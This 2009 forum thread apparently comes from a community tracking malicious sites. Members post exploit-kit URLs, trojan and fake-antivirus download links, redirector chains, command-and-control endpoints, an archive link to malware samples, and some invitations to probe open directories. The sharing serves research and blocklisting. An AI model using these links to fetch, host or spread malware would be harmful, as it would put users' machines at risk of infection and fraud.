Post by: SysAdMini on April 08, 2009, 11:30:55 am
exploits/trojan
Code: [Select]
www.besplatnoe-porno.info/downloads/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=937bb224a8eb2fd48d1d812a867c9623&t=1239190412&type=js
http://www.virustotal.com/analisis/99a1a9d2003b23212842cd22ee90c129 3/40
Title: Re: daily something......
Post by: SysAdMini on April 08, 2009, 11:39:35 am
exploits
Code: [Select]
m.winxyz.com
http://wepawet.iseclab.org/view.php?hash=d66445fca10663d693af2f98cd2d398c&t=1239171377&type=js

Code: [Select]
http://winxyz.com/win/j.exe
http://www.virustotal.com/analisis/ce445dadf7062fd70787035dbca77edf 13/40

Code: [Select]
http://winzxm.com/win/u.exe
http://www.virustotal.com/analisis/e06dfabe4a1a7fabf065604678b24b9c 11/39
Title: Re: daily something......
Post by: sowhat-x on April 09, 2009, 01:19:05 am
TDSS variant:
http://www.virustotal.com/analisis/f24fe6a2671b58376efafef6b068254c
Quote
hxxp://traffbox.com/in.cgi?6
hxxp://goscandata.com/?uid=12404
hxxp://scan7live.com/?uid=12404
hxxp://scan7live.com/download/install.php

Koobface variant:
http://www.virustotal.com/analisis/0d66a352aa6c6f7579fae43a1aba4c15
Quote
hxxp://traffbox.com/in.cgi?3
hxxp://hqviewworldmy1.com/view/1/1222/1/2
hxxp://hqviewworldmy1.com/download/1/1222/1/2
hxxp://hqviewworldmy1.com/software/c2fb59fa16/12221/1/2.exe

Notice that traffbox.com above redirects either to TDSS or Koobface, depending on parameters passed...

Now, same type Koobface variant as above, different hash though:
http://www.virustotal.com/analisis/2104a7d2b8c8a3fd2f84128d90c84fe9
Quote
hxxp://hqviewworldmy1.com/software/c2fb59fa16/10005/1/Setup.exe
========================
Quote
hxxp://welovesandi.com/?cmpid=
hxxp://crustat.com/ts/in.cgi?gen&se=oth&ur=1&hxxp_REFERER=wel-cmpid%3D
hxxp://www.scanspywareonline.com/online-scan.html?ewmid=231&pwebmid=gen&rejurl=hxxp://pnfzetnax.net/asw/gen/
hxxp://pnfzetnax.net/asw/gen/
hxxp://truconv.com/?a=125&s=gen-asw
hxxp://top-name.cn/in.cgi?default&a=ks125&s=gen-asw
hxxp://total-virusprotection.com/xpprot/7/?a=ks125&s=gen-asw&z=
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe
--->
Quote
hxxp://setup.total-virusprotection.com/ -> Open dir... ;-)
--->
The executables there... (md5 dupes not listed)
Quote
hxxp://setup.total-virusprotection.com/total-malwareprotection.com/1.0.11.0/updatexpvps.exe
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe.1
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe

Play around with crustat.com's parameters above, it generates numerous nifty links...
========================
Plus another open dir with fake AVs...have fun:
Quote
hxxp://download.pcantimalwaresolution.com/

Quote
hxxp://offer-provider.com/srm/adv/142/
hxxp://dwnld.offer-provider.com/secure/940907dc34c7bed5e75f1e517b2b3a42/49dd612d/srm/srm_free_setup.exe

Quote
hxxp://infracleaner.in/download.php?affid=02935

Quote
hxxp://onlinebrandsecurity.com/download.php?affid=17503
Title: Re: daily something......
Post by: sowhat-x on April 09, 2009, 12:36:07 pm
Direct link to the executable in dwnld.offer-provider.com above, seems to have changed since yesterday...
Quote
hxxp://dwnld.offer-provider.com/secure/85f2be819efd8db13b4fab89c8a1d2db/49dde7f1/srm/srm_free_setup.exe

Plus, it's an open dir, for the time being...
Quote
hxxp://dwnld.offer-provider.com/

36 unique .exes there - here are the md5 checksums...

Here they are archived in .7z format ...78mb approximately:
http://www.megaupload.com/?d=Y33LVTZH
Title: Re: daily something......
Post by: CkreM on April 09, 2009, 06:20:17 pm
Rogue:
Code: [Select]
scanner.rapid-antivir-2009.com/35/?advid=1694&ref=0&p=1000000000
soft-traffic.com

Redirect to rogue:
Code: [Select]
rd-point.net/go.php?id=1188
Exploit/trojan:
Code: [Select]
http://projectns.biz/sploits/pdf.php?id=2
http://wepawet.iseclab.org/view.php?hash=46aa9abb1ac32cdd3134f0230694fc1b&t=1239188557&type=js

Exploit/trojan:
Code: [Select]
vas4k.cn/pabl/
http://wepawet.iseclab.org/view.php?hash=f39bbd62bab727dc7c075547dd3df249&t=1239191102&type=js

trojan:
Code: [Select]
http://secondgate.ru/77/load.php?id=2
http://www.virustotal.com/analisis/4c5fd3e65565e2b33c68c855a58de0ca

trojan:
Code: [Select]
http://bankitrade.com/exp/l.php?b=2&s=djdak
http://www.virustotal.com/analisis/7070fe304677bbda85dfd8a6970ab46f
Title: Re: daily something......
Post by: SysAdMini on April 10, 2009, 01:24:35 pm
pdf/flash exploit
Code: [Select]
x.lousecn.cn
http://wepawet.cs.ucsb.edu/view.php?hash=bc0b5c2d562ee175849da928de2727b4&t=1239369858&type=js

Code: [Select]
http://x.lousecn.cn/load.php?id=2
http://virscan.org/report/b0abe06d8536b4abe35c6beb9079a5b6.html 4/37
Title: Re: daily something......
Post by: SysAdMini on April 10, 2009, 02:43:58 pm
Code: [Select]
msn-gallery.us/f.jpg
http://virscan.org/report/6735f8decd6ffb129052f297220957c3.html 0/37


Title: Re: daily something......
Post by: sowhat-x on April 10, 2009, 03:00:06 pm
C&C server:
Quote
hxxp://moneystyle.com.cn/bmngr/controller.php?action=bot&entity_list=

Quote
hxxp://www.new-mrcash.net/images/x_01.jpg
Seems like a failed attempt at using Thinstall to me, anyway...
http://anubis.iseclab.org/?action=result&task_id=13ee47e6969787c64dd38f52f3e9842ee&format=html
http://www.virustotal.com/analisis/34a6262329fda4fb398c57de90201a7a

Quote
hxxp://www.new-mrcash.net/images/win_04.jpg
http://www.virustotal.com/analisis/b188a358f58d5b8a0074f81fc79a0f25
Title: Re: daily something......
Post by: GmG on April 10, 2009, 04:16:08 pm
Exploit
Code: [Select]
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php
Title: Re: daily something......
Post by: SysAdMini on April 10, 2009, 04:25:03 pm
Exploit
Code: [Select]
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php


all lead to

trojan Hiloti
Code: [Select]
67.215.246.138/a12/aff_12.exe?u=i_7_0&spl=4
http://virscan.org/report/e01f5e00ab1a5916117edaf06bdfd4f1.html 4/37
Title: Re: daily something......
Post by: neoark on April 11, 2009, 12:12:46 pm
Found the whole list, not sure if some of them are already included or not.

Quote
hxxp://193.138.172.15/salo/?16de305069114a106409128eb3bb985b8d4d98674d1376589cbccfd886874a6072e088f250fa24f1270c05764cfe398e75b8936c7cd308dcfab00d2d5beafff0 DIRECT/193.138.172.15
hxxp://193.138.172.15/salo/?27a2f14df1d2659997c6434cebe6df547dff29131b9812ee9e49a3402a2c9a0cd6fc3e067512f7802e3b072473443089755efbe378162268855fb15dd41ddd1b DIRECT/193.138.172.15
hxxp://193.200.255.19/%7Etimchenko/cms/cache/readme.pdf DIRECT/193.200.255.19
hxxp://194.165.5.20/sp/7.pdf DIRECT/194.165.5.20
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/210.83.85.100
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/213.182.197.229
hxxp://202.73.57.6/tomi/?1643bf49f40997de68d1f717b843a34e44612930cf3f24bc08ef9b738eb345962032326f97041b59e6df8f3d76d59a24c4f6a58f05e382fdab2fd26adc9ff32e DIRECT/202.73.57.6
hxxp://78.129.166.5/%7Exqz/sp/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.93.80 DIRECT/78.129.166.5
hxxp://7ioi.biz/fo/spl/pdf.pdf DIRECT/213.182.197.236
hxxp://94.247.2.122/us.pdf DIRECT/94.247.2.122
hxxp://94.247.2.195/news/?id=2 DIRECT/94.247.2.195
hxxp://96.0.13.1/jms/sploits/test.pdf DIRECT/96.0.13.1
hxxp://alibaster-lab.com/ku4ka/?06f069b34f8391ebb6b30bea77dd544a00c51b31052c162535b1651701bdbc8d795bfdad269883f3bcffd34481d4b002aaf7794493ec9d458a16526e53f4ec55 DIRECT/195.216.175.114

All of the above are pdf/java exploits.
Title: Re: daily something......
Post by: SysAdMini on April 11, 2009, 01:59:28 pm
Found the whole list, not sure if some of them are already included or not.


Most of those URLs have already been on the list.

It looks like Malekal's exploit list.
Title: Re: daily something......
Post by: Malware-Web-Threats on April 11, 2009, 11:32:53 pm
193.111.244.21

Exploit (util.printf) - Wepawet (http://wepawet.iseclab.org/view.php?hash=11d02f5e15a36bdf8ff9a7f8779b5929&t=1239491654&type=js)

Code: [Select]
hxxp://onlinepharmacy4you.org/65/iepdf.php?f=new
Trojan

Code: [Select]
hxxp://onlinepharmacy4you.org/65/load.php
hxxp://www.kandidatov.net/1/p.exe
VirusTotal (http://www.virustotal.com/analisis/037af797be509dc3da1380fdf34df1c5) 35/40 (87.5%)

Anubis (http://anubis.iseclab.org/?action=result&task_id=1b3cce6a0deb513e4fdc83a2990e917ce)
Title: Re: daily something......
Post by: CkreM on April 12, 2009, 05:06:58 am
Zbot
Code: [Select]
finik.us/live/load.php?e=1
http://www.virustotal.com/analisis/f081994ac023069ebe47ddd949adc743
Rogue:
Code: [Select]
http://www.chorussoft.com/install.exe
http://www.virustotal.com/analisis/a06a11e5549f88f483d564c2582ccc97

This IP is full of rogue:
http://www.bfk.de/bfk_dnslogger_en.html?query=64.191.12.38#result
The ones that aren't in MDL:
Code: [Select]
ms-antispyware2009.com
pro-antispyware2009.com
http://files.load-antivir-pro-pc.com/release/setup.exe
totalantispyware2009.com
totalantispyware.com
system-cleanerpro.com
syscleanerpro.com
totalantispyware.net

other Rogue:

Code: [Select]
http://ugh-softwares.com/promo.exe
http://gdfshgfh.com/promo.exe
http://uniquexporn.com/promo.exe
http://www.virustotal.com/analisis/14a94fb9a291d16fbbade9a078d67846

Code: [Select]
http://bonuspromooffer.com/srm/adv/142/?a=cspsant1p&l=273&f=cs_7175823974&ex=&ed=&sub=&prodabbr=USRM
Title: Re: daily something......
Post by: GmG on April 12, 2009, 04:59:30 pm
exploit

Code: [Select]
http://niggerok.com/fafa/index.php
http://wepawet.iseclab.org/view.php?hash=84b34a34e05a7d00fe9198ae4d2d5424&t=1239555288&type=js

Code: [Select]
http://expfanclub.com/lom/index.php
http://wepawet.iseclab.org/view.php?hash=b410ff492fbd79ddfae0c102b7792993&t=1239555215&type=js

Code: [Select]
http://seofucking.com/vavilon/
http://wepawet.iseclab.org/view.php?hash=9d3ad64e279e1692d7490f208600c233&t=1239555455&type=js

Title: Re: daily something......
Post by: CkreM on April 12, 2009, 05:29:01 pm
The last one, which leads to http://seofucking.com/vavilon/load.php, is the Ambler trojan.
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 07:19:24 am
195.88.80.41

Code: [Select]
hxxp://slk-downloads.com/promo.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/73c3f615c00dcc5718e7b6279fa0961a) 7/40 (17.5%)

76.73.21.186

config:
Code: [Select]
http://76.73.21.186/ldr/loadList.php?version=1
files:
Code: [Select]
hxxp://76.73.21.186/ldr/dl/zchMiB.exe
hxxp://76.73.21.186/ldr/dl/part.exe
hxxp://76.73.21.186/ldr/dl/minisvr4.exe (not found)
hxxp://76.73.21.186/ldr/dl/clkw.exe
hxxp://76.73.21.186/ldr/dl/websvr.exe

VirusTotal results:

zchMiB.exe - Trojan Autoit (http://www.virustotal.com/analisis/99e6d74df3bc3be73509bdfbe62aa4dc) 21/39 (53.85%)
part.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 21/40 (52.5%)
clkw.exe - Trojan Autoit (http://www.virustotal.com/analisis/85daff7fe1ee66559bda58efea4f4d90) 13/40 (32.50%)
websvr.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 10/40 (25%)
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 09:32:38 am
194.165.4.77

Code: [Select]
hxxp://loyal-porno.com/scan/?
hxxp://loyal-porno.com/tube/?
hxxp://loyal-porno.com/codec.exe

1) Fake Scanner Page
2) Fake Codec Page
3) Trojan

VirusTotal (http://www.virustotal.com/analisis/dfde556533497ac71d555742d6d6f741) 7/40 (17.5%)
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 11:33:33 am
91.212.41.119

Code: [Select]
hxxp://tixwagoq.cn/in.cgi?6

redirect to exploit

91.212.41.119

Code: [Select]
hxxp://paylayos.cn/nuc/index.php

which loads

Code: [Select]
hxxp://paylayos.cn/nuc/exe.php

then loads the flash exploit

Code: [Select]
hxxp://paylayos.cn/nuc/spl/pdf.pdf

to finally load the executable

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/823401c2f51007764b713f0894342507) 8/40 (20.00%)

Redirection Analysis: Wepawet (http://wepawet.iseclab.org/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js)
Title: Re: daily something......
Post by: sparsha on April 13, 2009, 06:55:31 pm
Code: [Select]

http://internetprotectedupdates.com/logo.bmp
http://protectionupdatecenter.com/wincontrol.dll

http://no-virus-pro-scan.com/11041/3/
http://files.pro-load-av-files.com/normal/setup_11041_3_1.exe

best-click-av1.info
http://download.best-click-av1.info/en/PE/install.exe

http://files.load-ms-av-soft.com/exe/setup_1_2_1.exe

http://dl.super-top-scan-pro.com/get/?pin=0&lnd=0&type=main
http://dl.anispy-storage-ms.com/get/?pin=0&lnd=0&type=main

http://in6iz.com/download/InternetAntivirusPro.exe
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 07:14:24 pm
Other links for "best-click-av1.info":

Code: [Select]
http://download.best-click-av1.info/install.php?campaign=mmb_227523872&country=en&counter=4&campaign=mmb_227523872&landid=4
http://download.best-click-av1.info/en/PE/N1.CAB
http://download.best-click-av1.info/en/PE/QWProtect.dll
http://download.best-click-av1.info/en/PE/svchost.exe

VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/05357372ad0d72bf7fbb682e49f05539) 33/40 (82.5%)
VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/8a46dd8ec034177dc10243b33ba3fd1b) 11/39 (28.21%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/4e4aa550f799e703a19bff8939c14d56) 25/38 (65.79%)
VirusTotal: Trojan FakeAlert (http://www.virustotal.com/analisis/cc494b775cbce5316563c216335d1fc3) 28/38 (73.68%)
Title: Re: daily something......
Post by: sparsha on April 13, 2009, 07:14:56 pm
Sites related to Vxgame Trojan

Code: [Select]
http://onlinescanxp.com/?a=conf&code=502
antivirusxppro-2009.com
5-renus2008.com
http://free-web-scaners.biz/scan/?code=435

Title: Re: daily something......
Post by: lanvin on April 13, 2009, 07:31:56 pm
hxxp://w1.akc8.com/01/s.exe
hxxp://w1.ys8c.com/01/s.exe
hxxp://down.zhibo8.com/soft/spvod.exe
Title: Re: daily something......
Post by: CkreM on April 13, 2009, 09:32:06 pm
fake AV
Code: [Select]
http://lj3q.biz/av.26.0.exe
http://www.virustotal.com/analisis/b79cb1ea34600095ce75b3fccbfa5af3
Code: [Select]
http://megsw.com/av.26.0.exe
http://www.virustotal.com/analisis/d027aec77ed8c403b77c0b5b92e1ab97

Fake av loader
Code: [Select]
http://www.trart.net/vildanezik.net/album/default.exe
http://www.virustotal.com/analisis/14dbac952360d7d0672e372a75e9177b
Code: [Select]
http://porntubevidz.com/14.exe
http://www.virustotal.com/analisis/fc537777547fbeb743764d71e97edf4f

Trojan
Code: [Select]
http://216.195.58.114:35813/getLoader.php?p=1zHniWUaKiCQt
http://www.virustotal.com/analisis/41394ae810a5b070c6a4a48f664a75b5
Trojan
Code: [Select]
http://totalmic.if.ua/ftp2.exe
http://www.virustotal.com/analisis/049e37d45db1e083ce5c3def69aac306
Trojan
Code: [Select]
http://banksguard.com/pics/ncr.exe
http://www.virustotal.com/analisis/58dcebabde517dd1c0e38257b43a9e62
Trojan
Code: [Select]
http://auf-jeder.com/123.exe
http://www.virustotal.com/analisis/55f110a5dd1d46d6d29bcab867dd123c
Title: Re: daily something......
Post by: sparsha on April 14, 2009, 04:09:42 pm
Sites related to Rogue security applications

Code: [Select]
system-cleaner.net/load/setup.msi
tantispyware.com/load/setup.msi
webantispy.com/load/setup.msi
pantispyware09.com/dwn/setup.exe
Title: Re: daily something......
Post by: RS-232 on April 14, 2009, 07:01:53 pm
Quote
hxxp://usrv03.ru/index.php?x=1
hxxp://usrv03.ru/pdf_1.php?id=3304

http://wepawet.iseclab.org/view.php?hash=fcb37c12aa47d8d4911a81e3d9749c95&t=1239735089&type=js
http://anubis.iseclab.org/?action=result&task_id=1ec2e01cf8ff3f72431c9490b047d70ef&format=html
Title: Re: daily something......
Post by: GmG on April 14, 2009, 07:09:03 pm
Code: [Select]
http://antivirusxp09.com/img/
http://antivirusxp09.com/new/index.php
http://antivirusxp09.com/new2/index.php
http://antivirusxp09.com/new3/index.php

http://wepawet.iseclab.org/view.php?hash=1502f37ba459292fae9c5cffd524c714&t=1239736282&type=js
http://anubis.iseclab.org/?action=result&task_id=1f6f85e9801c0bf942dd45076c2ebac87
http://www.virustotal.com/analisis/5aca8d47cc3b7b20cb77529cede96a6a
Title: Re: daily something......
Post by: Malware-Web-Threats on April 15, 2009, 12:30:51 am
Rogue Fake AV

Code: [Select]
hxxp://star4scan.com
hxxp://scan6easy.com
hxxp://scan6fast.com
hxxp://lux4scan.com
hxxp://luxscan4.com
hxxp://msscanner-files-av.com/200109/scan/
Title: Re: daily something......
Post by: CkreM on April 15, 2009, 05:10:20 am
Trojan:
Code: [Select]
79.174.64.13/out.exe
http://www.virustotal.com/analisis/7bca934bb8e377eebe4edebfebf8523a
Trojan:
Code: [Select]
mal-waredoc.com/load.php?id=2
http://www.virustotal.com/analisis/11576255e0680454c54efa2766cc9435
Trojan
Code: [Select]
s0si.ru/TT/load.php
http://www.virustotal.com/analisis/a4a966837adda2c3cc34d981c93d93e6
Trojan:
Code: [Select]
tradepark.info/photos/load.php
http://www.virustotal.com/analisis/17a9c3d18044191a539072b82821e766
Trojan:
Code: [Select]
95.129.144.186/gf/ma.exe
http://www.virustotal.com/analisis/5e2316512208bcc9e0b38856182c39b1

Fake AV:
Code: [Select]
95.129.144.186/gf/swp.exe
http://www.virustotal.com/analisis/d05a9eb3e36e93f5fbe35d9375892596
Rogue:
Code: [Select]
spy-wareprotector2009.com
Title: Re: daily something......
Post by: SysAdMini on April 15, 2009, 09:34:25 am
Code: [Select]
kroto.biz/myy/index.php
kroto.biz/myy/cache/readme.pdf
kroto.biz/myy/cache/flash.swf
kroto.biz/myy/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=ba0ba1b23890b2b70125f744960bd863&t=1239788253&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40

Code: [Select]
kroto.biz/myy/index.php
kroto.biz/ins/cache/readme.pdf
kroto.biz/ins/cache/flash.swf
kroto.biz/ins/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=e7fd2ee3c218c66ad961163569df5dca&t=1239788768&type=js
http://www.virustotal.com/analisis/1176e423edaf89cf29ca7299fac7eefd 0/40

Code: [Select]
kroto.biz/opi/index.php
kroto.biz/opi/cache/readme.pdf
kroto.biz/opi/cache/flash.swf
kroto.biz/opi/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=a21882d077d3295aa223d46ef0e61158&t=1239788777&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40

Title: Re: daily something......
Post by: SysAdMini on April 15, 2009, 11:58:10 am
Redirector, play with the number:
Code: [Select]
cjtrader.biz/in.php?s=1
Redirects to Fake AV:
Code: [Select]
tdncgo2009.com/?uid=36&pid=3
Fake AV
Code: [Select]
http://virussweeper-scanvirus.net/?p=nqd2a16poZ2eYJqMoKNqq6iQtFPEmZSjj8KqqVeYlJjXnrmMiXl%2BhIo%3D
vswpr.googlecode.com/svn/trunk/ReleaseXP.exe
http://www.virustotal.com/de/analisis/29d5d657b1b1e9b49b7ba3ca26f76fbe 2/40

Title: Re: daily something......
Post by: Malware-Web-Threats on April 15, 2009, 10:08:34 pm
All rogue

74.54.156.234

Code: [Select]

75.125.200.226

Code: [Select]
hxxp://restore-pc.com/setup.php
hxxp://www.adwarealert.com/setup.exe
hxxp://evidenceeraser.com/setup.exe
Title: Re: daily something......
Post by: MysteryFCM on April 16, 2009, 04:14:07 am

Posted to:
http://bbs.vc52.cn/redirect.php?tid=82103
Title: Re: daily something......
Post by: CkreM on April 16, 2009, 05:33:33 am


gogo sysadm  ;D
Title: Re: daily something......
Post by: CkreM on April 16, 2009, 06:14:43 am
Trojan Webmoner
Code: [Select]
wiz2wix.com/out.exe
http://www.virustotal.com/analisis/b4c3c35969ab9091652570b7bb8f83ae
FTP Stealer
Code: [Select]
tayforlive.ru/ftp_G.exe
http://www.virustotal.com/analisis/978f0644b6375647f10d3043123aa537
Trojan:
Code: [Select]
ftpgeoit.com/exe/9sys270.exe
http://www.virustotal.com/analisis/bdaf84af42d6fe1c146ae4a68479674b
Trojan:
Code: [Select]
ftpgeoit.com/exe/gld.exe
http://www.virustotal.com/analisis/2813968773754764f195f9abc458672a
Trojan:
Code: [Select]
ftpgeoit.com/exe/lich.exe
http://www.virustotal.com/analisis/a3d56941a5206226d019d76071f9c354
Exploits/trojan:
Code: [Select]
homesy.net/mu/index.php
http://wepawet.iseclab.org/view.php?hash=943da6e620aeb897e9586e68771d1467&t=1239861325&type=js

Redirect to rogue:
Code: [Select]
Blogtransaction.cn/in.cgi?9
Bankinggolf.cn/in.cgi?9
Acousticnail.cn/in.cgi?9
ay.goldrushclub.cn/in.cgi?9
all redirect to
Code: [Select]
1000league.com/in.cgi?9 (which is on MDL)
http://wepawet.cs.ucsb.edu/view.php?hash=a67a5af0914956eaf26cb260d4632a3e&t=1239830585&type=js
Then to Rogue:
Code: [Select]
msscan-files-antivir.com/200109/scan/
Title: Re: daily something......
Post by: RS-232 on April 16, 2009, 11:43:26 am
Here's a nifty pdf exploit...
Quote
hxxp://d0lphin.biz/max/in.php
Result: 4/40 (10%)
http://www.virustotal.com/analisis/de6f75f3c03f508662872923ff3c73bb

Here's what it returns for the time being...
http://wepawet.iseclab.org/view.php?hash=5edd49ee3561911ff34c53abade513a6&type=js
Result: 12/40 (30.00%)
http://www.virustotal.com/analisis/4e8ce4cab8a08a7754395eaf6192ce3a
Now go dig on the rest of domains there...
http://www.robtex.com/ip/210.83.85.94.html
===========================
Quote
hxxp://megapupseg.ru/xtrm/index.php
hxxp://www.murka-best.com/index.php?sall=miks_ind
===========================
Quote
hxxp://team-sleep.by.ru/menu.html
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/courier.html
hxxp://5rublei.com/unique/index.php
hxxp://bizoplata.ru/mortgage.html
hxxp://myrurrly.com/in.cgi?pipka3S
hxxp://tixwagoq.cn/in.cgi?4
hxxp://tochtonenado.com/yes/index.php
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/belt.html
hxxp://mixbunch.cn/scarf.html
http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1239885967&type=js
===========================
Quote
hxxp://startdontstop.ru/bigmac.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
Title: Re: daily something......
Post by: SysAdMini on April 16, 2009, 02:43:26 pm
Code: [Select]
http://www.webpresence4u.co.uk/forms/use/email/POSTALESAMORPORSIEMPRE.php
http://www.virustotal.com/analisis/a57dbbe538cbe01a060e27c60e0ff2a0
http://www.threatexpert.com/report.aspx?md5=ba19812a5c24c50bb7480d55e2e081ca

Corresponding IRC C&C:
Code: [Select]
cnz0k3r.cdmon.org:6667
Title: Re: daily something......
Post by: CkreM on April 17, 2009, 03:13:47 am
Exploit which leads to the Pinch trojan:
Code: [Select]
counnter.cn/z/count.php?o=1
http://wepawet.iseclab.org/view.php?hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253&type=js
The Pinch trojan:
Code: [Select]
counnter.cn/z/getexe.exe?o=1&t=1239892251&i=2057619350&e=1
http://www.virustotal.com/analisis/da79eef38206c2e643777c17191ea4a8

Exploit/trojan:
Code: [Select]
teenagersporn.net/project2/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bad316b7e10f1195eda2adf0c3da0a49&t=1239918254&type=js
Exploit/trojan:
Code: [Select]
google-advisior.cn/project2/index.php
http://wepawet.iseclab.org/view.php?hash=535c6efb84e00f72ff3f5ecf9aca3df5&t=1239870763&type=js
Exploit/trojan:
Code: [Select]
hackzona.info/s/index.php
http://wepawet.iseclab.org/view.php?hash=dcac90e453678bee26d187e37474d291&t=1239872153&type=js
PDF exploit/trojan:
Code: [Select]
http://liteautogreatest.cn/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=2030ec9e4312994722b9a2037911d8dc&t=1239819716&type=js

Domain listed on MDL but on a different directory:
Code: [Select]
d0lphin.biz/mix/pdf.php
http://wepawet.iseclab.org/view.php?hash=5e69487565b54590dc4521945162dbe7&t=1239873022&type=js

Redirects to rogue:
Code: [Select]
sotoviy.info/0/go.php?sid=2
uouo.info/0/go.php?sid=2
leshik.info/0/go.php?sid=2
wazo.info/0/go.php?sid=2
lavo.info/0/go.php?sid=2
reliable-anti-virus.info/0/go.php?sid=2
webportal-sms.info/0/go.php?sid=2
spyware-guard.info/0/go.php?sid=2
spyware-soft.info/0/go.php?sid=2
spyware-security.info//0/go.php?sid=2
all redirect to online scan:
Code: [Select]
loyal-porno.com/scan/?id=260
Title: Re: daily something......
Post by: SysAdMini on April 18, 2009, 08:31:25 am
Code: [Select]
www.catch-you.ru/files/winsetup66.exe
http://www.virustotal.com/analisis/e63c9ea8320708d2dd2e705f6bf73da6 8/40
http://www.threatexpert.com/report.aspx?md5=6c05f6bd103d84523d6aea9d19b3f2cd

Code: [Select]
www.catch-you.ru/files/wingo.exe
http://www.virustotal.com/analisis/eb2b1f73f0f3ace4a8243aa46845cc91 18/40

Code: [Select]
www.catch-you.ru/files/ftp_non_crp.exe
http://www.virustotal.com/analisis/acd15fdd1fa850b4a0d162ebde7dadf2 35/40

Code: [Select]
www.catch-you.ru/files/ru12.exe
http://www.virustotal.com/de/analisis/a74d38aa72e78450b2eb46a299a72b8a 2/39

Code: [Select]
www.catch-you.ru/files/jnk.exe
http://www.virustotal.com/analisis/bf082a8a4632ea8d382d3fb756713b2a 13/39

Code: [Select]
www.catch-you.ru/files/pac2.exe
http://www.virustotal.com/analisis/5cc7f9b74b036bd4dc4975035711fd28 10/37

Code: [Select]
www.catch-you.ru/files/Winset20.exe
http://www.virustotal.com/analisis/f46ca5e54daa7244a134623b968c74b8 5/40
http://www.threatexpert.com/report.aspx?md5=b88e83a2fc5d229f0a3ed5e790c395e1

Code: [Select]
www.catch-you.ru/files/1000.exe
http://www.virustotal.com/analisis/02a62655684eb0bdeb9acd9a23deb80f 17/39
Title: Re: daily something......
Post by: Malware-Web-Threats on April 18, 2009, 10:27:35 am
Exploit:
Code: [Select]
hxxp://beebest.cn/dlutrl23dnwfas/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=8c979b2883f0cf92419a4b342fff4545&t=1240050576&type=js)

PDF:
Code: [Select]
hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1240050583&type=js)
VirusTotal (http://www.virustotal.com/analisis/c6e2fe3fbaf95d5730763c3f4d819808) - 10/40 (25%)

Exe:
Code: [Select]
hxxp://beebest.cn/dlutrl23dnwfas/exe.php
VirusTotal (http://www.virustotal.com/analisis/e215d34b9667869918886503a1233011) - 7/40 (17.5%)
Title: Re: daily something......
Post by: sparsha on April 19, 2009, 07:27:13 am
AV Antispyware rogue related sites
Code: [Select]

http://int.reporting32.com/stat.php?func=installrun&id=200002&landing=-1&lang=EN&sub=0
http://dl.scan-antispy-4pc.com/get/?pin=0&lnd=0&type=main
http://sales.mypaymentarea.com/MjAwMDAy_MA==_QkE0MjAxNEM5RTNCMjI3OEE2QkI=/YXZh/1
https://wisypay.net/purchase/?vendor=2&id=49eaa01f4444b

Title: Re: daily something......
Post by: CkreM on April 20, 2009, 05:57:08 am
Redirects to exploits:
Code: [Select]
odmina.ru/?v=myid37&lid=1033
http://wepawet.iseclab.org/view.php?hash=2a8ea1f1e331a0826ca485ab9e3232e3&t=1240038315&type=js
Redirect to exploits:
Code: [Select]
mixbunch.cn/thread.html
http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js
Exploits/trojan:
Code: [Select]
sunmaiamibich.ru/pupu/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628&type=js

Trojan:
Code: [Select]
tayforlive.ru/gh.exe
http://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037
Trojan:
Code: [Select]
feds-r-watching.us/load.php?id=0&spl=1.exedec
http://www.virustotal.com/analisis/8b1f9ae18260c2d50f447e34eef66e02

Redirect to rogue:
Code: [Select]
spyware-files.info/0/go.php?sid=2
spyware-file.info/0/go.php?sid=2

AV fraud:
Code: [Select]
http://loyalvideoz.com/scan/?id=260
